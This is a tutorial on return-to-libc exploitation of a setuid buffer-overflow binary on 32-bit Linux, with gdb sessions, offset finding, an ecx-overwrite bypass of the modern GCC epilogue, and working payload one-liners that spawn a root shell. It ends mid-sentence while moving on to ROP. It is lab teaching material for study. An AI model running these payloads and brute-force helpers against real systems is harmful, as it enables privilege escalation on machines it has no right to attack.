Return to libc on modern 32 bit and 64 bit Linux

What's up guys. In our last post we learned how to do a stack-based buffer overflow on a 64 bit Linux system, but we had most of the protection mechanisms disabled. So we easily exploited the binary by loading our shellcode on the stack and overwriting the return pointer with the address of the shellcode. Ultimately we executed code from the stack. If you haven't read the last post yet, I recommend reading that first and then starting this one. Now what if the stack is made non-executable? It means you can still load shellcode on the stack and overwrite the return pointer, but you can't execute it.

Okay, so we can't execute on the stack. But we still control the return pointer and can point it to some area in memory which is executable. If we can find the same CPU instructions as our shellcode in that area, we can get a shell. We may not find all the instructions at one address, but we can try to chain them. Sounds cool.


By this time you must be familiar with at least the basic assembly instructions like push, pop, mov, lea, ret, etc. and be able to visualize the layout of the stack and registers after each instruction. If not, you might feel lost further on, though I will still try to explain as much as I can. In this post we will first do a classic return to libc attack on an old 32 bit Linux and then on modern 32 bit and 64 bit Linux. We will also learn about Return Oriented Programming (ROP) and ROP chaining.

Old 32 bit Linux

We will be using the same vulnerable source code as in the previous article, but this time we keep the stack non-executable. Compile it and set the setuid-root flag on the binary. ASLR is turned off: /proc/sys/kernel/randomize_va_space is set to '0' (edited with sudo nano /proc/sys/kernel/randomize_va_space).
user@former:~$ gcc buf.c -o buf -fno-stack-protector
user@former:~$ sudo chown root buf
user@former:~$ sudo chmod +s buf
This time we don't pass the -z execstack flag, so the stack is not executable, i.e. NX protection is in effect for it. Verify it with
user@former:~$ objdump -p buf
buf: file format elf32-i386
architecture: i386, flags 0x00000112:
start address 0x08048340

Program Header:
PHDR off 0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2
filesz 0x000000e0 memsz 0x000000e0 flags r-x
INTERP off 0x00000114 vaddr 0x08048114 paddr 0x08048114 align 2**0
filesz 0x00000013 memsz 0x00000013 flags r--
LOAD off 0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
filesz 0x00000514 memsz 0x00000514 flags r-x
LOAD off 0x00000514 vaddr 0x08049514 paddr 0x08049514 align 2**12
filesz 0x0000010c memsz 0x00000114 flags rw-
DYNAMIC off 0x00000528 vaddr 0x08049528 paddr 0x08049528 align 2**2
filesz 0x000000d0 memsz 0x000000d0 flags rw-
NOTE off 0x00000128 vaddr 0x08048128 paddr 0x08048128 align 2**2
filesz 0x00000044 memsz 0x00000044 flags r--
STACK off 0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2
filesz 0x00000000 memsz 0x00000000 flags rw-  <======Only read and write permissions for stack
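If you want to script this check, here is a minimal Python 3 sketch that reads the text printed by objdump -p and pulls out the flags of the STACK program header. The function name stack_flags and the sample string are made up for illustration; the sample simply repeats the two STACK lines from the output above.

```python
def stack_flags(objdump_output):
    """Return the flags string (e.g. 'rw-') of the STACK program header, or None."""
    lines = objdump_output.splitlines()
    for i, line in enumerate(lines):
        if line.split()[:1] == ["STACK"]:
            # objdump -p prints the flags on the line right after the header name,
            # so look at the STACK line itself and the one following it.
            for candidate in lines[i:i + 2]:
                tokens = candidate.split()
                if "flags" in tokens:
                    idx = tokens.index("flags")
                    if idx + 1 < len(tokens):
                        return tokens[idx + 1]
    return None


# The two STACK lines copied from the objdump output above.
sample = (
    "STACK off 0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2\n"
    "filesz 0x00000000 memsz 0x00000000 flags rw-\n"
)

flags = stack_flags(sample)
print(flags, "-> executable stack" if "x" in flags else "-> non-executable stack")
```

No 'x' in the flags means the stack is mapped without execute permission, which is exactly what we see here.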
Let's load it in gdb and disassemble it. The addresses are now just 4 bytes (4*8 = 32 bits) since it is a 32 bit ELF executable.
(gdb) disas main
Dump of assembler code for function main:
0x080483f4 <main+0>:  push ebp
0x080483f5 <main+1>:  mov ebp,esp                   ; prologue
0x080483f7 <main+3>:  and esp,0xfffffff0            ; and operation sets last digit in esp to 0
0x080483fa <main+6>:  add esp,0xffffff80            ; Allocate 0x80 bytes stack space
0x080483fd <main+9>:  mov eax,DWORD PTR [ebp+0xc]   ; eax=value of [ebp+0xc]
0x08048400 <main+12>: add eax,0x4                  ; eax=eax+0x4
0x08048403 <main+15>: mov eax,DWORD PTR [eax]      ; eax=value at addr eax
0x08048405 <main+17>: mov DWORD PTR [esp+0x4],eax  ; value of [esp+0x4]=eax - arg for strcpy  
0x08048409 <main+21>: lea eax,[esp+0x1c]           ; eax=address of [esp+0x1c]
0x0804840d <main+25>: mov DWORD PTR [esp],eax      ; value at addr [esp]= eax - arg for strcpy
0x08048410 <main+28>: call 0x8048320 <strcpy@plt>  ; call strcpy function
0x08048415 <main+33>: mov eax,0x8048500            ; eax=0x8048500 arg-"Input was: %s\n"
0x0804841a <main+38>: lea edx,[esp+0x1c]           ; edx=address of [esp+0x1c]
0x0804841e <main+42>: mov DWORD PTR [esp+0x4],edx  ; value at [esp+0x4]= edx - addr of buf[100]
0x08048422 <main+46>: mov DWORD PTR [esp],eax      ; value at [esp]=eax - "Input was: %s\n"
0x08048425 <main+49>: call 0x8048330 <printf@plt>  ; call printf function
0x0804842a <main+54>: mov eax,0x0                  ; eax=0x0
0x0804842f <main+59>: leave                        ; epilogue
0x08048430 <main+60>: ret 
End of assembler dump.
One difference you might see from the 64 bit disassembly is that the arguments for functions are placed on top of the stack. For example, see the lines at *main+42 and *main+46. Maybe this property can be helpful to us in future exploitation. Now we need to figure out the offset of the return address, point it to some executable area in memory and chain a few instructions for arbitrary code execution. First we find the process id of our process with print getpid() in gdb and look at its memory maps with shell cat /proc/$pid/maps or info proc maps.
(gdb) p getpid()
$1 = 1864
(gdb) shell cat /proc/1864/maps
08048000-08049000 r-xp 00000000 00:10 5732       /home/user/buf
08049000-0804a000 rw-p 00000000 00:10 5732       /home/user/buf
b7e96000-b7e97000 rw-p 00000000 00:00 0 
b7e97000-b7fd5000 r-xp 00000000 00:10 759        /lib/
b7fd5000-b7fd6000 ---p 0013e000 00:10 759        /lib/
b7fd6000-b7fd8000 r--p 0013e000 00:10 759        /lib/
b7fd8000-b7fd9000 rw-p 00140000 00:10 759        /lib/
b7fd9000-b7fdc000 rw-p 00000000 00:00 0 
b7fe0000-b7fe2000 rw-p 00000000 00:00 0 
b7fe2000-b7fe3000 r-xp 00000000 00:00 0          [vdso]
b7fe3000-b7ffe000 r-xp 00000000 00:10 741        /lib/
b7ffe000-b7fff000 r--p 0001a000 00:10 741        /lib/
b7fff000-b8000000 rw-p 0001b000 00:10 741        /lib/
bffeb000-c0000000 rw-p 00000000 00:00 0          [stack]
What's that ?

C Standard Library - libc

Let's read the man page for it, 'man libc'. The term "libc" is commonly used as a shorthand for the "standard C library", a library of standard functions that can be used by all C programs (and sometimes by programs in other languages). So it consists of functions, type definitions and header files for string handling, mathematical operations, I/O and other tasks, plus wrappers for Linux operating system services. Functions like printf, strcpy, execve, system, etc. are defined in it. The library is dynamically linked to your program when it is loaded, and that is how your program knows how to carry out the operations for such a function. We will read more about how it is dynamically linked in the ret2plt and ret2got exploits. So it even contains the instructions for functions like execve, execl, system, etc. And we know that with proper arguments we can (ab)use them to execute a shell. Let's try it. First find the offset of the return address.
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A
Starting program: /home/user/buf Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A
Input was: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A

Program received signal SIGSEGV, Segmentation fault.
0x64413764 in ?? ()

user@former:~$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 64413764
[*] Exact match at offset 112
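If you don't have Metasploit around, the same lookup can be sketched in a few lines of Python 3. This is only an illustration of the idea, not the Metasploit implementation: cyclic_pattern and pattern_offset are names I made up, and the pattern is rebuilt from the "Aa0Aa1Aa2..." scheme visible in the input above.

```python
import string
import struct


def cyclic_pattern(length):
    """Build an 'Aa0Aa1Aa2...' pattern of the requested length."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, length=1024):
    """Offset of a 32-bit value (as gdb prints it) inside the pattern, or -1."""
    # gdb shows the register as a number; in memory the bytes are little endian.
    needle = struct.pack("<I", value).decode("ascii")
    return cyclic_pattern(length).find(needle)


print(pattern_offset(0x64413764))  # 112, same as pattern_offset.rb above
```

0x64413764 is the little endian form of the bytes "d7Ad", which first appear 112 bytes into the pattern.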
We can execute "/bin/sh" with execve or system, but execve needs two of its arguments to be NULL, and since our vulnerable code uses strcpy we can't get null bytes on the stack directly. We will see how to get null bytes on the stack later in this post. For now let's just use system. We will also use the Python Exploit Development Assistance (PEDA) extension for gdb this time. You can install it from its GitHub page. Consider a small program whose main just calls system with the string "/bin/sh"; compiling and executing it will give you a /bin/sh shell. Let's load it in gdb, set a breakpoint at the function call and see how the argument is passed to it.
gdb-peda$ disas main
Dump of assembler code for function main:
   0x080483c4 <+0>: push   ebp
   0x080483c5 <+1>: mov    ebp,esp
   0x080483c7 <+3>: and    esp,0xfffffff0
   0x080483ca <+6>: sub    esp,0x10
   0x080483cd <+9>: mov    DWORD PTR [esp],0x80484a0
   0x080483d4 <+16>: call   0x80482ec <system@plt>
   0x080483d9 <+21>: leave  
   0x080483da <+22>: ret    
End of assembler dump.
gdb-peda$ b *main+16
Breakpoint 1 at 0x80483d4
gdb-peda$ r
Starting program: /home/archer/compiler_tests/sys 
EAX: 0xf7f98d98 --> 0xffffd0fc 
EBX: 0x0 
ECX: 0xb73f45c0 
EDX: 0xffffd084 --> 0x0 
ESI: 0xf7f96e28 --> 0x1ced30 
EDI: 0x0 
EBP: 0xffffd058 --> 0x0 
ESP: 0xffffd040 --> 0x80484a0 ("/bin/sh")
EIP: 0x80483d4 (<main+16>: call   0x80482ec <system@plt>)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
   0x80483c7 <main+3>: and    esp,0xfffffff0
   0x80483ca <main+6>: sub    esp,0x10
   0x80483cd <main+9>: mov    DWORD PTR [esp],0x80484a0
=> 0x80483d4 <main+16>: call   0x80482ec <system@plt>
   0x80483d9 <main+21>: leave  <=return address for function 'system'
   0x80483da <main+22>: ret    
   0x80483db: nop
   0x80483dc: nop
Guessed arguments:
arg[0]: 0x80484a0 ("/bin/sh")
0000| 0xffffd040 --> 0x80484a0 ("/bin/sh")
0004| 0xffffd044 --> 0x80481e4 --> 0x30 ('0')
0008| 0xffffd048 --> 0x80483fb (<__libc_csu_init+11>: add    ebx,0x1199)
0012| 0xffffd04c --> 0x0 
0016| 0xffffd050 --> 0xf7f96e28 --> 0x1ced30 
0020| 0xffffd054 --> 0xf7f96e28 --> 0x1ced30 
0024| 0xffffd058 --> 0x0 
0028| 0xffffd05c --> 0xf7de0793 (<__libc_start_main+243>: add    esp,0x10)
Legend: code, data, rodata, value

Breakpoint 1, 0x080483d4 in main ()
Hmm. It takes one argument from the top of the stack, which is the address of the string "/bin/sh". One more thing to notice is that whenever a function is called, the address of the next instruction becomes its return address. So when the function is done executing, the program counter will point back to the return address. Here it will return to *main+21, i.e. 0x80483d9. To call system and execute a shell we need to load the proper arguments on the stack and overwrite the return address of the vulnerable program with the address of the system function in libc. Sounds doable. Load the vulnerable program back in gdb and run it once with a breakpoint so that libc is dynamically linked. Time to find the address of the system function.
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7ecffb0 <__libc_system>
Great. Now let's see what our payload must look like.
payload = 112 bytes of junk + system + return address for system + address of "/bin/sh"
Notice how the first thing after the address of system is a return address and not the first argument to the function. This is because when you step into a function call, the call instruction first saves the return address on top of the stack and only then is stack space for the function created. When the function is done it restores the stack, so the previously saved return address is again on top of the stack when ret executes. In our case we jump directly to the function address instead of using the call instruction, so when the function is done it will still execute its ret instruction and look for a return address where call would have put it. Therefore we have to provide a return address before the arguments. This info will be useful further on when making longer ROP chains.

We already have the address of system. The return address for system can be anything, but if it's an invalid address you might get a segmentation fault after exiting the shell, as eip will try to execute from it. Here I will return to the exit function so that after the shell exits, the program exits without errors.
(gdb) p exit
$2 = {<text variable, no debug info>} 0xb7ec60c0 <*__GI_exit>
Third thing we need to find is address of "/bin/sh" string. Let's see if it can be found in libc library.
user@former:~$ strings -t x /lib/ | grep "/bin/sh"
 11f3bf /bin/sh
Got it. The strings command prints all strings in /lib/ and the -t x flag prints the offset of each string in hexadecimal. We pipe that to grep, which prints the line containing "/bin/sh". Great. The offset of /bin/sh is 0x11f3bf in libc. To find the exact address just add that to the base of libc we found in the process maps. x/s will print the value at that address as a string.
(gdb) x/s 0xb7e97000+0x11f3bf
0xb7fb63bf:  "/bin/sh"
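With all three addresses known, the payload layout from earlier can be sketched in Python 3. This is just a sketch using the addresses from my gdb session above; yours will differ. The helper name p32 is my own shorthand for struct.pack with a little endian 32 bit format.

```python
import struct

LIBC_BASE = 0xb7e97000     # start of libc's r-xp mapping in the process maps
BINSH_OFFSET = 0x11f3bf    # offset of "/bin/sh" reported by strings -t x
SYSTEM = 0xb7ecffb0        # from "p system"
EXIT = 0xb7ec60c0          # from "p exit"
OFFSET = 112               # bytes of junk before the saved return address


def p32(value):
    """Pack a 32-bit address in little endian byte order."""
    return struct.pack("<I", value)


binsh = LIBC_BASE + BINSH_OFFSET

# junk + system + return address for system (exit) + argument for system
payload = b"A" * OFFSET + p32(SYSTEM) + p32(EXIT) + p32(binsh)

# strcpy stops at the first NUL, so the payload must not contain one.
assert b"\x00" not in payload
print(hex(binsh))
```

The order matters: the word right after system is where system will return to, and only the word after that is read as its argument.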
You can also view process mappings in peda with vmmap.
gdb-peda$ vmmap
Start    End      Perm  Name
08048000 08049000 r-xp /home/user/buf
08049000 0804a000 rw-p /home/user/buf
b7e96000 b7e97000 rw-p /home/user/buf
b7e97000 b7fd5000 r-xp /lib/
b7fd5000 b7fd6000 ---p /lib/
b7fd6000 b7fd8000 r--p /lib/
b7fd8000 b7fd9000 rw-p /lib/
b7fd9000 b7fdc000 rw-p mapped
b7fe0000 b7fe2000 r--p [vvar]
b7fe2000 b7fe3000 r-xp [vdso]
b7fe3000 b7ffe000 r-xp /lib/
b7ffe000 b7fff000 r--p /lib/
b7fff000 b8000000 rw-p /lib/
bffeb000 c0000000 rw-p [stack]
Time to make the final payload and run it. Remember to enter the addresses in little endian.
user@former:~$ ./buf `python2 -c "print 'A'*112 + '\xb0\xff\xec\xb7'+'\xc0\x60\xec\xb7' + '\xbf\x63\xfb\xb7'"`
# id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)
# whoami
# exit
Bingo, we have a root shell. It didn't even require us to load shellcode, and we exited without error. If you fill the return address for system with 4 random bytes you might see a segmentation fault. Since this was an old 32 bit Linux we didn't have to worry about setuid(0);. Also the libc addresses won't change outside gdb, so you need not worry about them. This was fairly easy. Time for a modern 32 bit compiled binary, which might have a few more protection mechanisms.

Modern 32 bit ELF Binary

This time I will compile the same program for 32 bit architecture with a modern compiler. I am using 64 bit Ubuntu 17.10 for compilation, so there will be a -m32 flag for the compiler to force 32 bit architecture. You might want to install gcc-multilib first for 32 bit compilation on 64 bit. ASLR and stack canaries are still disabled.
virtual@mecha:~$ cat /proc/sys/kernel/randomize_va_space
virtual@mecha:~$ gcc buf.c -o buf -m32 -fno-stack-protector
virtual@mecha:~$ sudo chown root buf
virtual@mecha:~$ sudo chmod +s buf
Load it in gdb and disassemble. I have explained each instruction on the right. You don't need to know each and every instruction for the exploit; just visualizing the changes in the layout of the stack and registers at key instructions is enough. You can also check the security protections of the binary with the checksec command in PEDA.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
gdb-peda$ disas main
Dump of assembler code for function main:
   0x0000054d <+0>: lea    ecx,[esp+0x4]           ; ecx = address of [esp+0x4]
   0x00000551 <+4>: and    esp,0xfffffff0          ; and operation on esp.
   0x00000554 <+7>: push   DWORD PTR [ecx-0x4]     ; push value at [ecx-0x4], i.e. the return address
   0x00000557 <+10>: push   ebp                     ; push ebp on stack
   0x00000558 <+11>: mov    ebp,esp                 ; ebp=esp
   0x0000055a <+13>: push   ebx                     ; push ebx on stack
   0x0000055b <+14>: push   ecx                     ; push ecx on stack
   0x0000055c <+15>: sub    esp,0x70                ; allocate 0x70=112 bytes on stack
   0x0000055f <+18>: call   0x450 <__x86.get_pc_thunk.bx>
   0x00000564 <+23>: add    ebx,0x1a70              ; ebx=ebx+0x1a70
   0x0000056a <+29>: mov    eax,ecx                 ; eax=ecx
   0x0000056c <+31>: mov    eax,DWORD PTR [eax+0x4] ; eax = value at addr [eax+0x4]
   0x0000056f <+34>: add    eax,0x4                 ; eax=eax+4
   0x00000572 <+37>: mov    eax,DWORD PTR [eax]     ; eax= value at addr [eax]
   0x00000574 <+39>: sub    esp,0x8                 ; esp=esp-0x8
   0x00000577 <+42>: push   eax                     ; push eax on stack
   0x00000578 <+43>: lea    eax,[ebp-0x6c]          ; load effective addr of [ebp-0x6c] to eax
   0x0000057b <+46>: push   eax                     ; push eax on stack
   0x0000057c <+47>: call   0x3e0 <strcpy@plt>      ; call strcpy function
   0x00000581 <+52>: add    esp,0x10                ; esp=esp+0x10
   0x00000584 <+55>: sub    esp,0x8                 ; esp=esp-0x8
   0x00000587 <+58>: lea    eax,[ebp-0x6c]          ; load effective addr of [ebp-0x6c] to eax
   0x0000058a <+61>: push   eax                     ; push eax on stack
   0x0000058b <+62>: lea    eax,[ebx-0x19a4]        ; load effective addr of [ebx-0x19a4] to eax
   0x00000591 <+68>: push   eax                     ; push eax on stack
   0x00000592 <+69>: call   0x3d0 <printf@plt>      ; call printf function
   0x00000597 <+74>: add    esp,0x10                ; esp=esp+0x10
   0x0000059a <+77>: mov    eax,0x0                 ; eax=0x0
   0x0000059f <+82>: lea    esp,[ebp-0x8]           ; load effective addr of [ebp-0x8] to esp
   0x000005a2 <+85>: pop    ecx                     ; pop top of stack to ecx
   0x000005a3 <+86>: pop    ebx                     ; pop top of stack to ebx
   0x000005a4 <+87>: pop    ebp                     ; pop top of stack to ebp
   0x000005a5 <+88>: lea    esp,[ecx-0x4]           ; load effective addr of [ecx-0x4] to esp
   0x000005a8 <+91>: ret
End of assembler dump.
Well, this seems pretty different from our previous disassembly. It looks like an additional protection mechanism, though it is really how newer GCC versions realign the stack in main. Instead of directly pushing ebp, saving esp in ebp and changing it back with the leave instruction, here the address esp+0x4 is first stored in ecx, and esp is restored from ecx at the end. In between, ecx is pushed on the stack and popped back just before returning. It means that if we overflow the buffer we overwrite the saved ecx with junk, and esp will never point back to the proper address at the end. After esp is loaded with some random address by the instruction lea esp,[ecx-0x4], the next instruction ret pops whatever is at that address into eip, so a plain return-address overwrite no longer lets us call functions like system.

Wait. Did I just say ecx is saved on the stack and our buffer can overwrite it? Great, we can find the offset of the saved ecx, overwrite it and make it point wherever we want. We control ecx, so we also control esp, which points to the top of the stack. We don't even need to worry about the original return pointer, because the ret instruction will pop the value at the top of our chosen stack and eip will point to that value. Lost? Don't worry, it will become clear in practice. First load the program in gdb and calculate the offset for ecx.
gdb-peda$ r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A
Starting program: /home/virtual/buf Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A
Input was: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A

Program received signal SIGSEGV, Segmentation fault.

EAX: 0x0 
EBX: 0x35644134 ('4Ad5')
ECX: 0x64413364 ('d3Ad')
EDX: 0xf7fb6894 --> 0x0 
ESI: 0x2 
EDI: 0xf7fb5000 --> 0x1ced70 
EBP: 0x41366441 ('Ad6A')
ESP: 0x64413360 ('`3Ad')
EIP: 0x565555a8 (<main+91>: ret)
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
   0x565555a3 <main+86>: pop    ebx
   0x565555a4 <main+87>: pop    ebp
   0x565555a5 <main+88>: lea    esp,[ecx-0x4]
=> 0x565555a8 <main+91>: ret    
   0x565555a9: xchg   ax,ax
   0x565555ab: xchg   ax,ax
   0x565555ad: xchg   ax,ax
   0x565555af: nop
Invalid $SP address: 0x64413360
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x565555a8 in main ()
ecx is 0x64413364. As you can see, the stack pointer is ecx-0x4, i.e. 0x64413360. So we are correct. We control ecx and therefore esp.
virtual@mecha:~$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 64413364
[*] Exact match at offset 100
So the saved ecx is located just after buf[100]. Let's visualize it. I have also marked how we want it to look after our exploit.

What we want is the address of system on top of the stack when ret executes, as the top of the stack is the return address for the ret instruction, followed by its return address and argument like we did last time. And we control the top of the stack: after the instruction at *main+88, esp will be ecx-0x4. This is what our payload will be.
payload = 100 bytes junk + address of esp+0x4 +|system + exit + addr of /bin/sh
                                               ^---we want esp to point here.
Time to find the unknowns.
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xf7e22d60 <system>
gdb-peda$ p exit
$2 = {<text variable, no debug info>} 0xf7e16070 <exit>
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0xf7f5c311 ("/bin/sh")
Found the system and exit functions. This time I just used the find command in gdb-peda to search for the string "/bin/sh", and it found it in libc. Here we execute /bin/sh with system. If you want to execute some other command and you can't find it in libc, you can export it as an environment variable and find its address with the find command, like we did in the previous article. It can live on the stack, as we only need to read the argument, not execute it. The missing thing now is the desired stack address. Let's run the exploit with the current payload and random bytes in place of ecx. Set a breakpoint at *main+85 to view the stack before ecx is popped.
payload = 100*'A' + 'BBBB' + '\x60\x2d\xe2\xf7' + '\x70\x60\xe1\xf7' + '\x11\xc3\xf5\xf7'
gdb-peda$ b *main+85
Breakpoint 3 at 0x565555a2
gdb-peda$ r $(python2 -c "print 'A'*100+'BBBB'+'\x60\x2d\xe2\xf7'+'\x70\x60\xe1\xf7'+'\x11\xc3\xf5\xf7'")
Starting program: /home/virtual/buf $(python2 -c "print 'A'*100+'BBBB'+'\x60\x2d\xe2\xf7'+'\x70\x60\xe1\xf7'+'\x11\xc3\xf5\xf7'")

EAX: 0x0 
EBX: 0x56556fd4 --> 0x1edc 
ECX: 0x80 
EDX: 0xf7fb6894 --> 0x0 
ESI: 0x2 
EDI: 0xf7fb5000 --> 0x1ced70 
EBP: 0xffffd248 --> 0xf7e16070 (<exit>: call   0xf7f184b9)
ESP: 0xffffd240 ("BBBB`-\342\367p`\341\367\021\303\365", )
EIP: 0x565555a2 (<main+85>: pop    ecx)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
   0x56555597 <main+74>: add    esp,0x10
   0x5655559a <main+77>: mov    eax,0x0
   0x5655559f <main+82>: lea    esp,[ebp-0x8]
=> 0x565555a2 <main+85>: pop    ecx
   0x565555a3 <main+86>: pop    ebx
   0x565555a4 <main+87>: pop    ebp
   0x565555a5 <main+88>: lea    esp,[ecx-0x4]
   0x565555a8 <main+91>: ret
0000| 0xffffd240 --> ("BBBB`-\342\367p`\341\367\021\303\365", )
0004| 0xffffd244 --> 0xf7e22d60 (<system>: sub    esp,0xc)
0008| 0xffffd248 --> 0xf7e16070 (<exit>: call   0xf7f184b9)
0012| 0xffffd24c --> 0xf7f5c311 ("/bin/sh")
0016| 0xffffd250 --> 0x0 
0020| 0xffffd254 --> 0xf7fb5000 --> 0x1ced70 
0024| 0xffffd258 --> 0x0 
0028| 0xffffd25c --> 0xf7dfe986 (<__libc_start_main+246>: add    esp,0x10)
Legend: code, data, rodata, value

Breakpoint 3, 0x565555a2 in main ()
The address of system sits at 0xffffd244 on the stack. We want esp to point here when ret executes. The epilogue sets esp = ecx-0x4, so we need ecx = esp+0x4. Therefore ecx = 0xffffd244 + 0x4 = 0xffffd248. Seems we have everything we want. Time for the final run.
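The same arithmetic as a Python 3 sketch, in case you want to recompute it for your own stack addresses. The function names are made up for illustration; the addresses are the ones from the gdb session above.

```python
import struct


def p32(value):
    """Pack a 32-bit value in little endian byte order."""
    return struct.pack("<I", value)


def esp_after_epilogue(ecx):
    """What 'lea esp,[ecx-0x4]' at *main+88 leaves in esp."""
    return (ecx - 4) & 0xffffffff


def ecx_for_target(target_esp):
    """ecx value that makes esp land on target_esp just before ret."""
    return (target_esp + 4) & 0xffffffff


system_slot = 0xffffd244              # stack address holding &system
ecx = ecx_for_target(system_slot)

payload = (
    b"A" * 100            # fills buf[100]
    + p32(ecx)            # popped into ecx at *main+85
    + p32(0xf7e22d60)     # system: where ret will jump
    + p32(0xf7e16070)     # exit: return address for system
    + p32(0xf7f5c311)     # "/bin/sh": argument for system
)

print(hex(ecx), hex(esp_after_epilogue(ecx)))
```

Note that the system and exit words are also popped into ebx and ebp on the way out, which is harmless here.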
payload = 'A'*100+'\x48\xd2\xff\xff'+'\x60\x2d\xe2\xf7'+'\x70\x60\xe1\xf7'+'\x11\xc3\xf5\xf7'
gdb-peda$ r $(python2 -c "print 'A'*100+'\x48\xd2\xff\xff'+'\x60\x2d\xe2\xf7'+'\x70\x60\xe1\xf7'+'\x11\xc3\xf5\xf7'")
Starting program: /home/virtual/buf $(python2 -c "print 'A'*100+'\x48\xd2\xff\xff'+'\x60\x2d\xe2\xf7'+'\x70\x60\xe1\xf7'+'\x11\xc3\xf5\xf7'")
[New process 5875]
process 5875 is executing new program: /bin/dash
[New process 5876]
process 5876 is executing new program: /bin/dash
Great, we got a shell. If you are wondering why it executed /bin/dash two times, it's because the system function actually executes the command in the format "/bin/sh -c <command>", and here the command is itself /bin/sh. You can read the man page of system for more info. Now execute it outside gdb. Remember the stack addresses will change outside gdb, so you need to shift the ecx value in the payload. One way to find the shift is with a simple test program: compile it and run it once inside gdb and once outside. You will get a rough idea of the change and it mostly works out. Otherwise just brute force it. Let's run it.
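To give an idea of the brute force approach, here is a hedged Python 3 sketch that only generates the candidate payloads; it is not the script used for the run shown next. The names candidate_payloads, TAIL and BAD_BYTES are made up, and the 0x10 step is an assumption based on main aligning esp to 16 bytes, so the saved ecx slot should move in multiples of 16. Each candidate would then be passed to ./buf as its first argument.

```python
import struct

BAD_BYTES = b"\x00\x09\x0a\x20"   # NUL, tab, newline, space


def p32(value):
    """Pack a 32-bit value in little endian byte order."""
    return struct.pack("<I", value & 0xffffffff)


# system + exit + "/bin/sh", as found in gdb above
TAIL = p32(0xf7e22d60) + p32(0xf7e16070) + p32(0xf7f5c311)


def candidate_payloads(ecx_in_gdb, max_shift=0x200, step=0x10):
    """Yield (shift, payload) pairs with ecx moved around its gdb value."""
    shifts = [0]
    for delta in range(step, max_shift + 1, step):
        shifts += [delta, -delta]
    for shift in shifts:
        payload = b"A" * 100 + p32(ecx_in_gdb + shift) + TAIL
        # Skip payloads that strcpy or the shell would cut short.
        if any(byte in BAD_BYTES for byte in payload):
            continue
        yield shift, payload


for shift, payload in candidate_payloads(0xffffd248, max_shift=0x20):
    print(hex(shift), payload[100:104].hex())
```

Trying the nearest shifts first keeps the number of crashes low when the difference between gdb and a normal run is small.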
virtual@mecha:~$ python2 
$ id 
uid=1000(virtual) gid=1000(virtual) groups=1000(virtual),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)
$ whoami
Cool it works. But again our privileges were dropped like last time. This isn't what we want !

For that we need to execute setuid(0); first. But how ?

Return Oriented Programming

Remember how we used code already in memory to execute our instructions and thus bypassed Data Execution Prevention? Yeah, I mean first we returned to the function 'system', passed it an argument and a return address, then after execution it returned to the 'exit' function. That is exactly the idea behind Return Oriented Programming. You can read more about it on its wiki page. The setuid function can also be found in libc, so we can return to it and pass it the proper argument from the stack. We want it to be setuid(0);. That means '0' must be the argument. But that is a NULL! Things get a bit tricky here. How can we get a null, actually 4 null bytes (0x00000000 = 4 bytes), on the stack when the strcpy function won't copy NULL characters?

How do functions like strcpy, gets and memcpy work? If you read their man pages you will see that they all take a destination address as an argument and copy bytes to it (strcpy and memcpy from a source address, gets from stdin). Hmmm. We can call one of these functions before setuid and overwrite the argument for setuid with NULLs. We can't use strcpy, since it won't copy null bytes. What about gets? Let's read its man page.
gets() reads a line from stdin into the buffer pointed to by s until either a 
